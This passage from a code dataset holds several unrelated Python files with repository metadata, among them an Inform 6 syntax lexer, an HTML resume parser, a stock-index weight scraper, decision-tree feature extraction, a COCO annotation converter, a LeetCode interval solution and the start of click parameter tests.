\"s_to\", \"e_to\", \"w_to\", \"ne_to\", \"se_to\", \"nw_to\",\n \"sw_to\", \"u_to\", \"d_to\", \"in_to\", \"out_to\", \"add_to_scope\",\n \"after\", \"article\", \"articles\", \"before\", \"cant_go\", \"capacity\",\n \"daemon\", \"describe\", \"description\", \"door_dir\", \"door_to\",\n \"each_turn\", \"found_in\", \"grammar\", \"initial\",\n \"inside_description\", \"invent\", \"life\", \"list_together\",\n \"name\", \"number\", \"orders\", \"parse_name\", \"plural\",\n \"react_after\", \"react_before\", \"short_name\", \"short_name_indef\",\n \"time_left\", \"time_out\", \"when_closed\", \"when_open\", \"when_on\",\n \"when_off\", \"with_key\"]\n\nextension_properties = [\"pname\"]\n\nkeywords = [\"box\", \"break\", \"continue\", \"do\", \"else\", \"font\",\n \"for\", \"give\", \"has\", \"hasnt\", \"if\", \"in\", 
\"inversion\", \"jump\",\n \"move\", \"new_line\", \"notin\", \"objectloop\", \"ofclass\", \"or\",\n \"print\", \"print_ret\", \"provides\", \"quit\", \"read\", \"remove\",\n \"restore\", \"return\", \"rfalse\", \"rtrue\", \"save\", \"spaces\",\n \"string\", \"style bold\", \"style fixed\", \"style reverse\",\n \"style roman\", \"style underline\", \"switch\", \"to\", \"until\",\n \"while\", \"with\"]\n\nconstants = [\"false\", \"true\"]\n\ndef wordlist(list):\n return \"(\" + \"|\".join(list) + r\")\\b\"\n\nclass InformLexer(RegexLexer):\n \"\"\"\n Inform code lexer.\n \"\"\"\n\n name = 'Inform 6'\n aliases = ['inform', 'inform6', 'i6']\n filenames = ['*.inf']\n mimetypes = ['text/x-inform', 'application/x-inform']\n\n tokens = {\n 'root': [\n (r'\"', String.Double, 'string-double'),\n (r\"'\", String.Single, 'string-single'),\n (r\"\\[ *\", Text, 'function-name'),\n\n (r'\\n', Text),\n (r'[^\\S\\n]+', Text),\n (r'!.*$', Comment.Single),\n (r'\\\\\\n', Text),\n (r'\\\\', Text),\n (r'=', Operator),\n (r\"[A-Za-z_,]+:\", Name.Label),\n (r\"<.+?>\", Name.Label),\n\n (wordlist(objects), Name.Class),\n (wordlist(keywords), Token.Keyword.Reserved),\n (wordlist(properties), Name.Builtin),\n (wordlist(directives), Name.Entity),\n (wordlist(attributes), Name.Attribute),\n (wordlist(constants), Name.Constant),\n\n (wordlist(extension_properties), Name.Builtin),\n\n (r'[a-zA-Z_][a-zA-Z0-9_.]*', Name),\n (r'(\\d+\\.?\\d*|\\d*\\.\\d+)([eE][+-]?[0-9]+)?', Number.Float),\n (r'\\d+', Number.Integer),\n\n (r'.', Punctuation),\n ],\n\n 'function-name': [\n (r\"[ ;]\", Text, '#pop'),\n (r\".\", Name.Function),\n ],\n\n 'string-double': [\n (r'\"', String.Double, '#pop'),\n (r'.', String.Double),\n (r'\\n', String.Double),\n ],\n\n 'string-single': [\n (r\"'\", String.Single, '#pop'),\n (r'.', String.Single),\n ],\n }\n","repo_name":"i6/ibg","sub_path":"tools/inform.py","file_name":"inform.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"18240421893","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 15 10:48:46 2019\r\n\r\n@author: NISCHAL\r\n\"\"\"\r\n\"\"\"\r\nProgram for paring the html file and finding the structure in the data\r\n\r\nGiven a html file the output is a csv file with the parameters defining the attributes of the string(text)\r\n\r\nMakes use of BeautifulSoup package for parsing the html data.\r\n\"\"\"\r\n\r\n# Importing BeautifulSoup\r\nimport bs4\r\nfrom bs4 import BeautifulSoup\r\n\r\n# Importing csv\r\nimport csv\r\n\r\ndef file_open(file_name):\r\n\t\"\"\"\r\n\tOpens the html file and converts it into Beautiful Soup object\r\n\r\n\tParams : file_name - Name of the file to be opened\r\n\r\n\tReturns : body_contents - a BeautifulSoup object\r\n\t\"\"\"\r\n\tif '.html' in file_name:\r\n\t\twith open(file_name, 'rb') as fp:\r\n\t\t\tsoup = BeautifulSoup(fp.read(), features = \"lxml\")\r\n\t\t\tbody_contents = soup.body.contents\r\n\t\t\treturn body_contents\r\n\r\ndef preprocess_data(body_contents):\r\n\t\"\"\"\r\n\tFinds pattern in the HTML object and stores it\r\n\r\n\tparams : body_contents - BeautifulSoup Object\r\n\r\n\treturn : dict_data - List of dictionaries containing string name and its parameters\r\n\t\"\"\"\r\n\tdict_data = []\r\n\tfor j in range(0, len(body_contents)):\r\n\t\tinner = list()\r\n\t\tstyles = list()\r\n\t\tif type(body_contents[j]) != bs4.element.NavigableString:\r\n\t\t\tres = list(body_contents[j].children)\r\n\r\n\t\t\tfor i in range(0, 
len(res)):\r\n\t\t\t\tif type(res[i]) != bs4.element.NavigableString:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tstyles.append(res[i]['style'])\r\n\t\t\t\t\texcept KeyError:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\tinner.append(list(res[i].children))\r\n\t\t\t\telse:\r\n\t\t\t\t\t#print(res[i])\r\n\t\t\t\t\tpass\r\n\r\n\t\tfor k, object in enumerate(inner):\r\n\t\t\tall_strings = ''\r\n\t\t\tall_strings = all_strings.encode('utf-8')\r\n\t\t\tfor string in object:\r\n\t\t\t\tif type(string) == bs4.element.NavigableString:\r\n\t\t\t\t\tstring = string.encode('utf-8')\r\n\t\t\t\t\tall_strings = all_strings + string\r\n\t\t\tinfo = {}\r\n\t\t\ttry:\r\n\t\t\t\tinfo['String'] = all_strings\r\n\t\t\t\tinfo['Style'] = styles[k]\r\n\t\t\t\tinfo['DIV-STYLE'] = body_contents[j]['style']\r\n\t\t\t\tdict_data.append(info)\r\n\t\t\texcept IndexError:\r\n\t\t\t\tpass\r\n\treturn dict_data\r\n\r\ndef write_csv(dict_data, f):\r\n\t\"\"\"\r\n\tWrites the found data in the csv file\r\n\r\n\tparams : dict_data - List of dictionaries each representing a string and its parameters like font size etc.\r\n\r\n\treturn : void\r\n\t\"\"\"\r\n\tcsv_columns = ['String', 'Font Type','Font Style', 'Font Description','Font Size','position', ' border', ' writing-mode', ' left', ' top', ' width', ' height']\r\n\tcsv_file = f.replace('.html', '')\r\n\tcsv_file = csv_file + '.csv'\r\n\ttry:\r\n\t\twith open(csv_file, 'w') as csvfile:\r\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames = csv_columns)\r\n\t\t\twriter.writeheader()\r\n\r\n\t\t\tfor data in dict_data:\r\n\t\t\t\tsrc = data['Style']\r\n\t\t\t\tx = src.find(':')\r\n\t\t\t\ty = src.find('+')\r\n\t\t\t\tz = src.find(';')\r\n\t\t\t\tfont_style = src[y+1:z]\r\n\t\t\t\tm = font_style.find('-')\r\n\t\t\t\tfont_description = ''\r\n\t\t\t\tif m == -1:\r\n\t\t\t\t\tfont_description = 'default'\r\n\t\t\t\telse:\r\n\t\t\t\t\tfont_description = font_style[m+1:]\r\n\t\t\t\t\tfont_style = font_style[:m]\r\n\t\t\t\tdel data['Style']\r\n\t\t\t\tdata['Font Type'] = src[x+2:y]\r\n\t\t\t\tdata['Font Style'] = font_style\r\n\t\t\t\tdata['Font Description'] = font_description\r\n\t\t\t\tdata['Font Size'] = src[len(src)-4:]\r\n\t\t\t\tlst = data['DIV-STYLE'].split(';')\r\n\t\t\t\tdel data['DIV-STYLE']\r\n\t\t\t\tfor i in range(0, len(lst) - 1):\r\n\t\t\t\t\ta = lst[i].split(':')\r\n\t\t\t\t\tdata[str(a[0])] = str(a[1])\r\n\t\t\t\ttry:\r\n\t\t\t\t\twriter.writerow(data)\r\n\t\t\t\texcept ValueError:\r\n\t\t\t\t\tpass\r\n\texcept IOError:\r\n\t\tprint(\"I/O error\")\r\n\texcept UnicodeEncodeError:\r\n\t\tprint('unicode error')\r\n\r\ndef generate_headings(dict_data):\r\n\t\"\"\"\r\n\tGenerates a dictionary containing all strings with their corresponding heading scores\r\n\r\n\tparams : dict_data - list of dictionaries\r\n\r\n\treturn : heading_scores - dictionary containing all strings with their corresponding heading scores\r\n\t\"\"\"\r\n\tfonts = list()\r\n\teligible_strings = dict()\r\n\theading_scores = dict()\r\n\r\n\tfor data in dict_data:\r\n\t\theading_scores[data['String']] = 0\r\n\t\tstring = data['String'].decode()\r\n\t\tstring = string.strip('\\n')\r\n\t\tstring = string.strip('\\r')\r\n\r\n\t\tfor i in range(0, len(string)):\r\n\t\t\tstring = string.strip(' ')\r\n\t\tstring = string.strip('-')\r\n\t\tstring = string.strip(':')\r\n\r\n\t\tlst = string.split(' ')\r\n\t\tfor i in range(0, len(lst)):\r\n\t\t\tif '' in lst:\r\n\t\t\t\tlst.remove('')\r\n\r\n\t\tif len(lst) <= 3:\r\n\t\t\theading_scores[data['String']] = 1\r\n\t\tstring = string.replace(' ', '')\r\n\r\n\t\tif 
string.isalpha():\r\n\t\t\tdata['Font Size'] = data['Font Size'].strip(':')\r\n\t\t\teligible_strings[data['String']] = data['Font Size']\r\n\r\n\t\t\tif data['Font Size'] not in fonts:\r\n\t\t\t\tfonts.append(data['Font Size'])\r\n\r\n\t\t\tif string.isupper():\r\n\t\t\t\theading_scores[data['String']] = heading_scores[data['String']] + 1\r\n\r\n\t# Sorting the fonts\r\n\tres = list()\r\n\tfor font in fonts:\r\n\t\tfont = font.strip('px')\r\n\t\tfont = int(font)\r\n\t\tres.append(font)\r\n\r\n\tres.sort()\r\n\tfonts = list()\r\n\tfor font in res:\r\n\t\tfont = str(font)\r\n\t\tfont = font + 'px'\r\n\t\tfonts.append(font)\r\n\r\n\tfor key, value in eligible_strings.items():\r\n\t\ttry:\r\n\t\t\theading_scores[key] = heading_scores[key] + fonts.index(value)\r\n\t\texcept ValueError:\r\n\t\t\tpass\r\n\r\n\treturn heading_scores\r\n\r\ndef find_headings(heading_scores):\r\n\t\"\"\"\r\n\tFinds the possible headings of the given resume\r\n\r\n\tparams : heading_scores - dictionary containing all strings with their corresponding heading scores\r\n\r\n\treturn - headings - list of strings which are the headings\r\n\t\"\"\"\r\n\theadings = list()\r\n\ti = 0\r\n\tj = 0\r\n\tint_max = 99999\r\n\tcur = 0\r\n\tfor w in sorted(heading_scores, key = heading_scores.get, reverse = True):\r\n\t\tif j < 5:\r\n\t\t\tif heading_scores[w] < int_max:\r\n\t\t\t\tint_max = heading_scores[w]\r\n\t\t\t\ti = i +1\r\n\t\t\tif i <= 3:\r\n\t\t\t\theadings.append(w)\r\n\t\t\t\tcur = heading_scores[w]\r\n\t\telse:\r\n\t\t\tif (heading_scores[w] == cur):\r\n\t\t\t\theadings.append(w)\r\n\t\tj = j + 1\r\n\treturn headings\r\n\r\ndef main():\r\n\tbody_contents = file_open(\"..\\htmls\\\\Nischal_resume.html\")\r\n\tdict_data = preprocess_data(body_contents)\r\n\twrite_csv(dict_data, 'Nischal_resume')\r\n\theading_scores = generate_headings(dict_data)\r\n\theadings = find_headings(heading_scores)\r\n\tprint(headings)\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"Nish-19/Unsupervised_Data_Mining","sub_path":"html_parser.py","file_name":"html_parser.py","file_ext":"py","file_size_in_byte":6038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12209296633","text":"import json, csv\nimport re\nimport requests\nimport os\nfrom constants import (nse_stock_list_url_dict, nse_weight_regex_pattern, index_weight_url, stock_list_url)\n\nclass Nifiio:\n def __init__(self):\n self.json_ext = '.json'\n self.csv_ext = '.csv'\n self.weightage_field_name = 'Weightage'\n \n def get_nse_index_weights(self, index_name):\n \"\"\"\n Returns a dictionary of all the stocks and their corresponding weights in the index.\n\n :param index_name: Name of the index\n :rtype: dict\n \"\"\"\n #prepare and send request to fetch data\n print(\"Fetching data for index {}\".format(index_name))\n url = index_weight_url.format(index_name.upper())\n # print('URL: {}'.format(url)) \n response = requests.get(url, timeout=10)\n print('Request URL: {}'.format(response.url))\n response_text = None\n \n if response.status_code != 200:\n print('Failed to get data: ', response.status_code)\n return None\n else:\n response_text = response.text\n \n #Compile regex and search in response text to fetch 'label:' <weight> from response \n if response_text is not None:\n print('Response received - parsing')\n # nse_json_regex_pattern = self.nse_weight_regex_pattern\n # pattern = re.compile(nse_json_regex_pattern)\n index_weight_data = nse_weight_regex_pattern.findall(response_text)\n # 
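debug: uncomment to inspect the raw label/weight matches before parsing\n            # 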
print(index_weight_data)\n\n #convert to dict form\n weight_data_dict = dict(st.rsplit(' ', 1) for st in index_weight_data)\n # print(weight_data_dict)\n weight_int_dict =\\\n {key : float(value.replace('%','')) for key, value in weight_data_dict.items()}\n \n return weight_int_dict\n else:\n print('Error: Response is empty!')\n return None\n \n \n def get_nse_index_stocklist(self, index_name):\n \"\"\"\n Returns a list of stocks in the index as a list of `OrderedDict` types.\n Each `OrderedDict` represents information of a stock in the index. Weights are not included.\n \n :param index_name: Name of the index\n :rtype: OrderedDict\n \"\"\"\n #prepare and send request to fetch data\n if index_name in nse_stock_list_url_dict:\n url = nse_stock_list_url_dict.get(index_name)\n else:\n trim_index_name = re.sub(r'\\s+', '', index_name)\n print(\"Fetching list of stocks for index {}\".format(index_name))\n url = stock_list_url.format(trim_index_name.lower())\n\n response = requests.get(url, timeout=10)\n print('Request URL: {}'.format(response.url))\n\n if response.status_code != 200:\n print('Failed to get data: ', response.status_code)\n return None\n else:\n response_text_split = response.text.splitlines()\n if response is not None:\n print('Response received - reading csv') \n reader = csv.DictReader(response_text_split)\n stock_list = list(reader) \n return stock_list\n else:\n print('Error: Response is empty!')\n return None\n\n def get_stocks_and_weights(self, index_name, write_to_file=False, file_types=None, write_to_file_path=None):\n \"\"\"Combines fetched stock data together with weights for a more comprehensive list containing details of stocks in the index, each stock represented by an `OrderedDict`.\n Data fetched can also be written to csv and json depending on the optional params.\n \n :param index_name: Name of the index\n :rtype: OrderedDict \n \"\"\"\n \n stock_list = self.get_nse_index_stocklist(index_name = index_name)\n weight_dict = self.get_nse_index_weights(index_name = index_name)\n trim_index_name = re.sub(r'\\s+', '', index_name)\n\n if stock_list is None or weight_dict is None:\n print('Couldn\\'t fetch stock data and/or weights!')\n return None\n\n # merge weight from list of weights into stock data using symbol\n print('Merging weights and stock info')\n for stock in stock_list:\n symbol = stock.get('Symbol')\n # print('Getting weight for symbol: {}'.format(symbol))\n weight = weight_dict.get(symbol)\n # print('Weight for {0} is {1}'.format(symbol, weight))\n stock[self.weightage_field_name] = weight\n \n if write_to_file is True:\n write_to_file_path = '' if write_to_file_path is None else str(write_to_file_path)\n if not os.path.isdir(write_to_file_path) and write_to_file_path is not None:\n print('Creating new directory')\n try:\n os.makedirs(write_to_file_path)\n except OSError:\n print('Error creating directory!')\n return stock_list\n\n if 'csv' in file_types:\n print('Writing to csv file.')\n output_file = write_to_file_path + 'index_data_weights_{}'.format(trim_index_name) + self.csv_ext\n\n #get field names from stock list \n for stock in stock_list[:1]:\n field_names = list(stock.keys())\n\n with open(output_file, 'w', newline='') as outfile:\n writer = csv.DictWriter(outfile, fieldnames=field_names)\n print('Field names: ', field_names)\n writer.writeheader()\n writer.writerows(stock_list)\n \n if 'json' in file_types:\n print('Writing to json file.')\n output_file = write_to_file_path + 'index_data_weights_{}'.format(trim_index_name) + self.json_ext\n\n 
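# note: json.dump writes the merged per-stock records as one JSON array\n                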
with open(output_file, 'w') as outfile:\n json.dump(stock_list, outfile) \n else:\n print('Skipped writing to file')\n\n return stock_list","repo_name":"lamavar/nifiio","sub_path":"nifiio/nifiio.py","file_name":"nifiio.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"34043335257","text":"import csv,operator,sys,os\nimport numpy as np\nimport sklearn\nimport json\nfrom functools import reduce\n\nsys.path.append('../arch-forest/data/adult/')\nsys.path.append('../arch-forest/data/')\nsys.path.append('../arch-forest/code/')\n\nimport Tree\n\n# Utility functions to ensure compatibility between my frequent trees and Sebastians decision trees \n\ndef _getMaxVertexId(vertex):\n if 'leftChild' in vertex.keys():\n leftMax = _getMaxVertexId(vertex['leftChild'])\n else:\n leftMax = 0\n \n if 'rightChild' in vertex.keys():\n rightMax = _getMaxVertexId(vertex['rightChild'])\n else:\n rightMax = 0\n\n return max(leftMax, rightMax, vertex['id'])\n\n\ndef _fillMembers(vertex, maxId):\n # ensure that all required members are there and that the tree is (unbalanced) binary\n if 'numSamples' not in vertex.keys():\n vertex['numSamples'] = 0\n\n # TODO this is just a temporary fix to get it to run. should be thought through more thoroughly...\n if 'feature' in vertex.keys():\n if 'probLeft' not in vertex.keys():\n vertex['probLeft'] = 0\n if 'probRight' not in vertex.keys():\n vertex['probRight'] = 0\n if 'isCategorical' not in vertex.keys():\n vertex['isCategorical'] = False\n if 'feature' not in vertex.keys():\n vertex['feature'] = 0\n if 'split' not in vertex.keys():\n vertex['split'] = 0\n\n # ensure that split nodes have two children\n if 'leftChild' in vertex.keys():\n maxId = _fillMembers(vertex['leftChild'], maxId)\n else:\n maxId += 1\n vertex['leftChild'] = {'id':maxId, 'numSamples':0, 'prediction':list()} \n if 'rightChild' in vertex.keys():\n maxId = _fillMembers(vertex['rightChild'], maxId)\n else:\n maxId += 1\n vertex['rightChild'] = {'id':maxId, 'numSamples':0, 'prediction':list()}\n\n return maxId\n\ndef makeProperBinaryDT(vertex):\n maxUsedVertexId = _getMaxVertexId(vertex)\n _fillMembers(vertex, maxUsedVertexId)\n return vertex\n\n\nclass FeatureGeneratingTree(Tree.Tree):\n \"\"\"A subclass of Sebastian Buschjäger et al.'s Tree class.\n It extends it to have a function like predict that returns the leaf node id on which the data maps\n instead of the prediction given by that node.\"\"\"\n \n def __init__(self, pattern):\n super(FeatureGeneratingTree, self).__init__()\n self.fromJSON(makeProperBinaryDT(pattern))\n self.n_nodes = len(self.nodes)\n\n \n def get_features(self, x, output=0):\n ''' to get nodeId set output as 0, to get count of comparisons set output to 1'''\n curNode = self.head\n counter = 0 \n\n # walk through the (partial) decision tree as long as possible\n while(curNode.prediction == None):\n counter +=1\n if (x[curNode.feature] <= curNode.split): \n curNode = curNode.leftChild\n else:\n curNode = curNode.rightChild\n if (output == 0): \n return curNode.id\n else:\n return counter\n #return counter\n #self.x_counter +=1\n \n def get_features_batch(self, X, output=0):\n return np.array([self.get_features(x, output) for x in X])\n\n\nclass FrequentSubtreeFeatures():\n \"\"\"A feature extraction algorithm that transforms you data point(s) x into a categorical feature space F\n corresponding to a random forest R. 
Each feature f in F corresponds to a decision tree T in the random forest R\n and each value of f corresponds to a leaf of T. That is, f(x) is the id of the leaf of T in which x would end up in.\n\n Most likely, you want to transform the features created here to a one-hot encoding. See the documentation of\n get_n_values() for some hints.\n \"\"\"\n\n def __init__(self, patterns=None):\n \"\"\"Init a new Feature Extractor Object corresponding to a random forest given as a list of decision trees as\n parsed json objects in the format used by Sebastian Buschjäger et al.\n ( available via git: git clone git@bitbucket.org:sbuschjaeger/arch-forest.git )\n\n Mainly used to create Feature Extractors that correspond to sets of frequent rooted subtrees in random forests.\n \"\"\"\n self.patterns = [FeatureGeneratingTree(pattern) for pattern in patterns]\n self.n_features = len(self.patterns)\n\n def get_n_values(self):\n \"\"\" Return the size of the feature set if the model is based on a single tree\n or a list of sizes of the individual feature sets of all trees in the model if there are more than one tree.\n\n This method is compatible with sklearn.preprocessing.OneHotEncoder in the following way:\n\n To allow OneHotEncoding with a fixed number of features that does not depend on the data,\n but only on the FeatureGeneratingTrees present in the model, use the following code:\n\n dsf = DecisionSnippetFeatures.FrequentSubtreeFeatures(map(lambda x: x['pattern'], frequentpatterns[-100:]))\n fts = dsf.fit_transform(X)\n fts_onehot = OneHotEncoder(n_values=dsf.get_n_values()).fit_transform(fts)\n \"\"\"\n size_list = [pattern.n_nodes for pattern in self.patterns]\n if len(size_list) == 1:\n return size_list[0]\n else:\n return size_list\n\n def get_categories(self):\n \"\"\" Variant of the above that is hopefully compatible with the sklearn.preprocessing.OneHotEncoder of newer sklearn versions\"\"\"\n size_list = [pattern.n_nodes for pattern in self.patterns]\n return [range(leaves) for leaves in size_list]\n \n def fit(self, X=None, y=None):\n \"\"\"Nothing to be done. The fitting already happenened during the creation of the random forest/decision tree/\n frequent rooted subtree models.\"\"\"\n pass\n \n def transform(self, X, output=0):\n \"\"\"Compute the ids of the leafs of the decision trees that the data points end up in. (default)\n Or compute the number of comparisons made during leaf id inference\"\"\"\n return np.stack([pattern.get_features_batch(X, output) for pattern in self.patterns]).T\n\n def fit_transform(self, X, output=0, y=None):\n \"\"\"Equivalent to transform(X).\n Compute the ids of the leafs of the decision trees that the data points end up in. 
(default)\n Or compute the number of comparisons made during leaf id inference\"\"\"\n return self.transform(X, output)\n\n","repo_name":"pwelke/DecisionSnippetFeatures","sub_path":"dsf/DecisionSnippetFeatures.py","file_name":"DecisionSnippetFeatures.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72652831357","text":"import argparse\nimport json\nimport os\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom detectron2.data.detection_utils import read_image\n\n\ndef parse_args():\n \"\"\"\n Parse input arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Convert Objects365 annotations into MS Coco format\"\n )\n parser.add_argument(\"--root_dir\", dest=\"root_dir\", help=\"path to objects365 data\", type=str)\n parser.add_argument(\n \"--apply_exif\",\n dest=\"apply_exif\",\n action=\"store_true\",\n help=\"apply the exif orientation correctly\",\n )\n parser.add_argument(\n \"--subsets\",\n type=str,\n nargs=\"+\",\n default=[\"val\", \"train\"],\n choices=[\"train\", \"val\", \"test\", \"minival\"],\n help=\"subsets to convert\",\n )\n parser.add_argument(\"--image_info_path\", type=str, help=\"image_info_path\")\n args = parser.parse_args()\n return args\n\n\nargs = parse_args()\nroot_dir = args.root_dir\n\nif args.apply_exif:\n print(\"-\" * 60)\n print(\"We will apply exif orientation...\")\n print(\"-\" * 60)\n\nif not isinstance(args.subsets, list):\n args.subsets = [args.subsets]\n\n\nfor subset in args.subsets:\n # Convert annotations\n print(\"converting {} data\".format(subset))\n\n # Select correct source files for each subset\n if subset == \"train\":\n json_name = \"zhiyuan_objv2_train.json\"\n elif subset == \"val\":\n json_name = \"zhiyuan_objv2_val.json\"\n elif subset == \"minival\":\n json_name = \"zhiyuan_objv2_val.json\"\n\n # Load original annotations\n print(\"loading original annotations ...\")\n json_path = os.path.join(root_dir, \"annotations\", json_name)\n json_data = json.load(open(json_path, \"r\"))\n print(\"loading original annotations ... 
Done\")\n\n print(json_data.keys())\n oi = {}\n\n # Add basic dataset info\n print(\"adding basic dataset info\")\n\n # Add license information\n print(\"adding basic license info\")\n oi[\"licenses\"] = json_data[\"licenses\"]\n\n # Convert category information\n print(\"converting category info\")\n oi[\"categories\"] = json_data[\"categories\"]\n\n # Convert image mnetadata\n print(\"converting image info ...\")\n images = json_data[\"images\"]\n if subset == \"minival\":\n images = images[:5000]\n print(f\"{len(images)} images get\")\n rm_image_ids = []\n\n if args.apply_exif:\n image_info = {}\n with open(args.image_info_path, \"r\") as f:\n for line in f.readlines():\n line = line.strip().split()\n image_id, file_name, height, width, channel = line\n\n image_id = int(image_id)\n height = int(height)\n width = int(width)\n\n image_info[image_id] = [file_name, height, width]\n\n print(f\"{len(image_info)} image_info get\")\n\n new_images = []\n for img in tqdm(images):\n image_id = img[\"id\"]\n\n if image_id not in image_info.keys():\n rm_image_ids.append(image_id)\n print(\"removing\", img)\n continue\n\n file_name, height, width = image_info[image_id]\n\n assert file_name == img[\"file_name\"]\n\n if width != img[\"width\"] or height != img[\"height\"]:\n print(\"before exif correction: \", img)\n img[\"width\"], img[\"height\"] = width, height\n print(\"after exif correction: \", img)\n\n new_images.append(img)\n images = new_images\n\n oi[\"images\"] = images\n print(f\"{len(images)} images keep\")\n\n # Convert instance annotations\n print(\"converting annotations ...\")\n annotations = json_data[\"annotations\"]\n print(f\"{len(annotations)} annotations get\")\n\n annotations = [ann for ann in annotations if ann[\"image_id\"] not in rm_image_ids]\n if subset == \"minival\":\n keep_image_ids = [img[\"id\"] for img in images]\n annotations = [ann for ann in annotations if ann[\"image_id\"] in keep_image_ids]\n\n oi[\"annotations\"] = annotations\n print(f\"{len(annotations)} annotations keep\")\n\n # Write annotations into .json file\n json_path = os.path.join(root_dir, \"annotations/\", \"objects365_{}.json\".format(subset))\n print(\"writing output to {}\".format(json_path))\n json.dump(oi, open(json_path, \"w\"))\n print(\"Done\")\n","repo_name":"shenyunhang/LPM","sub_path":"datasets/tools/objects3652coco/convert_annotations.py","file_name":"convert_annotations.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"2310290264","text":"\"\"\"\n# Definition for an Interval.\nclass v:\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\nclass Solution:\n def employeeFreeTime1(self, schedule: 'list<list<Interval>>') -> 'list<Interval>':\n worktime = []\n for i in schedule:\n for j in i:\n worktime.append(j)\n worktime = sorted(worktime, key=lambda x: x.start)\n if not worktime: return []\n pre_end = worktime[0].end\n res = []\n for i in worktime:\n if i.start > pre_end:\n res.append(Interval(pre_end, i.start))\n pre_end = i.end\n if pre_end < i.end:\n pre_end = i.end\n return res\n \n def employeeFreeTime(self, schedule: 'list<list<Interval>>') -> 'list<Interval>':\n worktime = []\n for i in schedule:\n for j in i:\n worktime.append((j.start, 0))\n worktime.append((j.end, 1))\n worktime.sort()\n pre = None\n res = []\n bal = 0\n for i,j in worktime:\n if pre is not None and bal == 0:\n res.append(Interval(pre, i))\n bal += 1 if j == 0 else -1\n pre = i\n 
return res\n","repo_name":"PaulGuo5/Leetcode-notes","sub_path":"notes/0759/0759.py","file_name":"0759.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74706851195","text":"from decimal import Decimal\n\nimport click\nimport pytest\n\nfrom click_params.miscellaneous import (\n JSON,\n MAC_ADDRESS,\n ChoiceListParamType,\n DateTimeListParamType,\n FirstOf,\n JsonParamType,\n MacAddressListParamType,\n StringListParamType,\n UUIDListParamType,\n)\nfrom tests.helpers import assert_equals_output, assert_in_output\n\n\n@pytest.mark.parametrize(\n ('parameter', 'name'),\n [\n (JSON, 'json'),\n (MAC_ADDRESS, 'mac address'),\n (StringListParamType(), 'string list'),\n (ChoiceListParamType(['a', 'b', 'c']), 'choice list'),\n (MacAddressListParamType(), 'mac address list'),\n (UUIDListParamType(), 'uuid list'),\n (DateTimeListParamType(), 'datetime list'),\n ],\n)\ndef test_parameter_name_and_representation_are_correct(parameter, name):\n assert name == parameter.name\n assert name.upper() == repr(parameter)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'message'),\n [\n (JSON, '2019-06-17', 'json string'),\n (JSON, '2f', 'json string'),\n (MAC_ADDRESS, '00:00:00:00:00', 'mac address'),\n (MAC_ADDRESS, 'foo', 'mac address'),\n ],\n)\ndef test_should_print_error_when_giving_incorrect_option_for_simple_types(runner, parameter, expression, message):\n @click.command()\n @click.option('-v', 'value', type=parameter)\n def cli(value):\n click.echo(value)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_in_output(2, f'{expression} is not a valid {message}', result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'message'),\n [\n (\n MacAddressListParamType(' '),\n 'D4:6A:6A:12:B0:75 foo 00:00:00:00:00',\n \"mac addresses: ['foo', '00:00:00:00:00']\",\n ),\n (UUIDListParamType(' '), 'foo a7309d0b-c858-4d54-b6e1-1c20f8c22047 142-48dr', \"uuid: ['foo', '142-48dr']\"),\n (DateTimeListParamType(' '), '145 2019-01-01 2019/01/01', \"datetimes: ['145', '2019/01/01']\"),\n ],\n)\ndef test_should_print_error_when_giving_incorrect_option_for_list_types(runner, parameter, expression, message):\n @click.command()\n @click.option('-v', 'values', type=parameter)\n def cli(values):\n click.echo(values)\n\n result = runner.invoke(cli, ['-v', expression])\n\n assert_in_output(2, f'These items are not {message}', result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'expected_output'),\n [\n (JSON, '2', '2\\n'),\n (JSON, '\"1.5\"', '1.5\\n'),\n (JSON, '{\"b\": 2, \"a\": \"foo\"}', \"{'b': 2, 'a': 'foo'}\\n\"),\n (MAC_ADDRESS, '01:23:45:67:ab:CD', '01:23:45:67:ab:CD\\n'),\n ],\n)\ndef test_should_print_correct_output_when_giving_correct_option_for_simple_types(\n runner, parameter, expression, expected_output\n):\n @click.command()\n @click.option('-j', 'json_string', type=parameter)\n def cli(json_string):\n click.echo(json_string)\n\n result = runner.invoke(cli, ['-j', expression])\n\n assert_equals_output(0, expected_output, result)\n\n\n@pytest.mark.parametrize(\n ('parameter', 'expression', 'expected_output'),\n [\n # string list\n (StringListParamType(), 'foo,bar', \"['foo', 'bar']\\n\"),\n (StringListParamType(), '', \"['']\\n\"),\n (StringListParamType(' '), '1 2 foo', \"['1', '2', 'foo']\\n\"),\n # choice list\n (ChoiceListParamType(['a', 'b', 'c']), 'a,b', \"['a', 'b']\\n\"),\n (ChoiceListParamType(['a', 'b', 'c'], separator=' '), 'a b c', \"['a', 'b', 
